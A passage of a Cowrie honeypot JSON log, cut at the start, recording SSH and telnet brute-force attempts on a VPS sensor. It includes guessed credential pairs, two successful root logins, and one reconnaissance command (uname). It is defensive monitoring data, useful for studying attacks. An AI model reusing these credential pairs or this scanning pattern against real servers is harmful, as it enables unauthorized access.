m","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:04:28.127064Z","src_ip":"212.227.125.160","session":"d9a2816e126d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-28T06:04:28.534782Z","src_ip":"212.227.125.160","session":"d9a2816e126d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:04:29.640734Z","src_ip":"212.227.125.160","session":"d9a2816e126d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37301,"dst_ip":"1.2.3.4","dst_port":23,"session":"77f54a4bb070","protocol":"telnet","message":"New connection: 212.227.235.229:37301 (1.2.3.4:23) [session: 77f54a4bb070]","sensor":"my-vps","timestamp":"2025-08-28T06:04:34.351888Z"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":46688,"dst_ip":"1.2.3.4","dst_port":23,"session":"7c0f99edf96d","protocol":"telnet","message":"New connection: 8.222.212.69:46688 (1.2.3.4:23) [session: 7c0f99edf96d]","sensor":"my-vps","timestamp":"2025-08-28T06:04:41.183147Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53794,"dst_ip":"1.2.3.4","dst_port":22,"session":"41343630795b","protocol":"ssh","message":"New connection: 212.227.125.160:53794 (1.2.3.4:22) [session: 41343630795b]","sensor":"my-vps","timestamp":"2025-08-28T06:04:43.387769Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:04:43.418861Z","src_ip":"212.227.125.160","session":"41343630795b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:04:43.505476Z","src_ip":"212.227.125.160","session":"41343630795b"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam123","message":"login attempt [steam/steam123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:04:43.914936Z","src_ip":"212.227.125.160","session":"41343630795b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:04:45.025233Z","src_ip":"212.227.125.160","session":"41343630795b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38825,"dst_ip":"1.2.3.4","dst_port":23,"session":"2477e3a80988","protocol":"telnet","message":"New connection: 212.227.235.229:38825 (1.2.3.4:23) [session: 2477e3a80988]","sensor":"my-vps","timestamp":"2025-08-28T06:04:45.199445Z"}
{"eventid":"cowrie.session.closed","duration":31.647355794906616,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:04:53.975253Z","src_ip":"212.227.235.229","session":"330383a8cf7d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47446,"dst_ip":"1.2.3.4","dst_port":22,"session":"236b48e7563f","protocol":"ssh","message":"New connection: 212.227.125.160:47446 (1.2.3.4:22) [session: 236b48e7563f]","sensor":"my-vps","timestamp":"2025-08-28T06:05:01.102197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:05:01.103462Z","src_ip":"212.227.125.160","session":"236b48e7563f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:05:01.209080Z","src_ip":"212.227.125.160","session":"236b48e7563f"}
{"eventid":"cowrie.login.failed","username":"es","password":"es","message":"login attempt [es/es] failed","sensor":"my-vps","timestamp":"2025-08-28T06:05:01.527934Z","src_ip":"212.227.125.160","session":"236b48e7563f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:05:02.635935Z","src_ip":"212.227.125.160","session":"236b48e7563f"}
{"eventid":"cowrie.session.closed","duration":31.899290323257446,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:05:06.251114Z","src_ip":"212.227.235.229","session":"77f54a4bb070"}
{"eventid":"cowrie.session.closed","duration":32.40239858627319,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:05:13.585476Z","src_ip":"8.222.212.69","session":"7c0f99edf96d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42670,"dst_ip":"1.2.3.4","dst_port":23,"session":"0098fdc634e5","protocol":"telnet","message":"New connection: 212.227.235.229:42670 (1.2.3.4:23) [session: 0098fdc634e5]","sensor":"my-vps","timestamp":"2025-08-28T06:05:14.388567Z"}
{"eventid":"cowrie.session.closed","duration":31.978429794311523,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:05:17.177786Z","src_ip":"212.227.235.229","session":"2477e3a80988"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58536,"dst_ip":"1.2.3.4","dst_port":22,"session":"c62602734482","protocol":"ssh","message":"New connection: 212.227.125.160:58536 (1.2.3.4:22) [session: c62602734482]","sensor":"my-vps","timestamp":"2025-08-28T06:05:20.174648Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:05:20.175505Z","src_ip":"212.227.125.160","session":"c62602734482"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39118,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ced3961bde1","protocol":"ssh","message":"New connection: 212.227.235.229:39118 (1.2.3.4:22) [session: 6ced3961bde1]","sensor":"my-vps","timestamp":"2025-08-28T06:05:20.200406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:05:20.201075Z","src_ip":"212.227.235.229","session":"6ced3961bde1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:05:20.280777Z","src_ip":"212.227.125.160","session":"c62602734482"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:05:20.344941Z","src_ip":"212.227.235.229","session":"6ced3961bde1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35924,"dst_ip":"1.2.3.4","dst_port":22,"session":"01d1c5942a99","protocol":"ssh","message":"New connection: 212.227.235.229:35924 (1.2.3.4:22) [session: 01d1c5942a99]","sensor":"my-vps","timestamp":"2025-08-28T06:05:20.496244Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:05:20.497117Z","src_ip":"212.227.235.229","session":"01d1c5942a99"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@WSX","message":"login attempt [root/1qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:05:20.599373Z","src_ip":"212.227.125.160","session":"c62602734482"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:05:20.641245Z","src_ip":"212.227.235.229","session":"01d1c5942a99"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@WSX","message":"login attempt [root/1qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:05:20.775949Z","src_ip":"212.227.235.229","session":"6ced3961bde1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:05:20.883729Z","src_ip":"212.227.125.160","session":"c62602734482"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:05:20.884427Z","src_ip":"212.227.125.160","session":"c62602734482"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:05:20.992661Z","src_ip":"212.227.125.160","session":"c62602734482"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:05:20.993783Z","src_ip":"212.227.125.160","session":"c62602734482"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:05:21.080846Z","src_ip":"212.227.235.229","session":"6ced3961bde1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:05:21.081707Z","src_ip":"212.227.235.229","session":"6ced3961bde1"}
{"eventid":"cowrie.login.failed","username":"es","password":"es","message":"login attempt [es/es] failed","sensor":"my-vps","timestamp":"2025-08-28T06:05:21.083299Z","src_ip":"212.227.235.229","session":"01d1c5942a99"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:05:21.225960Z","src_ip":"212.227.235.229","session":"6ced3961bde1"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:05:21.227292Z","src_ip":"212.227.235.229","session":"6ced3961bde1"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:05:22.229541Z","src_ip":"212.227.235.229","session":"01d1c5942a99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46264,"dst_ip":"1.2.3.4","dst_port":22,"session":"babd64f6cd0b","protocol":"ssh","message":"New connection: 212.227.125.160:46264 (1.2.3.4:22) [session: babd64f6cd0b]","sensor":"my-vps","timestamp":"2025-08-28T06:05:27.887330Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:05:27.920556Z","src_ip":"212.227.125.160","session":"babd64f6cd0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44531,"dst_ip":"1.2.3.4","dst_port":23,"session":"fa14bb2fabef","protocol":"telnet","message":"New connection: 212.227.235.229:44531 (1.2.3.4:23) [session: fa14bb2fabef]","sensor":"my-vps","timestamp":"2025-08-28T06:05:27.968067Z"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:05:28.019985Z","src_ip":"212.227.125.160","session":"babd64f6cd0b"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy","message":"login attempt [deploy/deploy] failed","sensor":"my-vps","timestamp":"2025-08-28T06:05:28.405323Z","src_ip":"212.227.125.160","session":"babd64f6cd0b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:05:29.511518Z","src_ip":"212.227.125.160","session":"babd64f6cd0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47332,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0d1be8abfcd","protocol":"ssh","message":"New connection: 212.227.235.229:47332 (1.2.3.4:22) [session: b0d1be8abfcd]","sensor":"my-vps","timestamp":"2025-08-28T06:05:35.069901Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:05:35.071008Z","src_ip":"212.227.235.229","session":"b0d1be8abfcd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:05:35.215069Z","src_ip":"212.227.235.229","session":"b0d1be8abfcd"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy","message":"login attempt [deploy/deploy] failed","sensor":"my-vps","timestamp":"2025-08-28T06:05:35.649103Z","src_ip":"212.227.235.229","session":"b0d1be8abfcd"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:05:36.796210Z","src_ip":"212.227.235.229","session":"b0d1be8abfcd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39738,"dst_ip":"1.2.3.4","dst_port":22,"session":"b32ad0e5a276","protocol":"ssh","message":"New connection: 212.227.125.160:39738 (1.2.3.4:22) [session: b32ad0e5a276]","sensor":"my-vps","timestamp":"2025-08-28T06:05:42.536722Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:05:42.656044Z","src_ip":"212.227.125.160","session":"b32ad0e5a276"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:05:42.656773Z","src_ip":"212.227.125.160","session":"b32ad0e5a276"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo","message":"login attempt [demo/demo] failed","sensor":"my-vps","timestamp":"2025-08-28T06:05:44.087212Z","src_ip":"212.227.125.160","session":"b32ad0e5a276"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:05:45.193447Z","src_ip":"212.227.125.160","session":"b32ad0e5a276"}
{"eventid":"cowrie.session.closed","duration":31.38096594810486,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:05:45.769460Z","src_ip":"212.227.235.229","session":"0098fdc634e5"}
